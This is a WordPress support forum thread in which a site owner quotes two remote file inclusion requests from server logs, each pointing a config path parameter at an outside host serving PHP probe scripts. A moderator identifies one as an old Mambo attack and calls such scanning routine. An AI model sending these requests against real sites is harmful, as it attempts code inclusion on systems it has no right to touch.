HackAttack on my WordPress

  • Hi All,

    When I was looking at my server logs, I discovered two interesting entries:

    /?config_path=https://www.gumgangfarm.com/shop/data/id.txt

    and

    /index.php?mosConfig_absolute_path=https://89.106.23.150:32000/test.txt

    When I surfed to these URLs, I saw that they contain PHP scripts that try to output information about my server. Do I need to be worried?

    I already looked up some info about the domains, but that probably won’t help me, I guess.

    What to do?

Viewing 3 replies - 1 through 3 (of 3 total)
  • Moderator Samuel Wood (Otto)

    (@otto42)

    www.ads-software.com Admin

    No. That is an attack directed at systems running Mambo, not WordPress. This giveaway is the mosConfig_absolute_path. Google for that and you’ll find that Mambo had a vulnerability there.

    Attackers spam their attacks across large numbers of sites. It’s easier and fast for them to do this than to try to determine what sort of site yours is first.

    Thread Starter jaap

    (@beulbek)

    Hi Otto,

    thanks for your quick reply. I recognized the giveaway for mambo in the second request, by “mos”. The first request though, I don’t know about.

    I don’t have any experience with these kind of attacks and I’m not sure how to handle them. Is it normal to receive these kind of ‘attacks’?

    You will see all kinds of attacks for various software packages, OS’s, etc. At some point, you’ll see huge blocks of attacks that are meant for Windows or MSSQL servers – absolutely normal. Keep up with the security updates and make sure you back your site up every once in awhile.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘HackAttack on my WordPress’ is closed to new replies.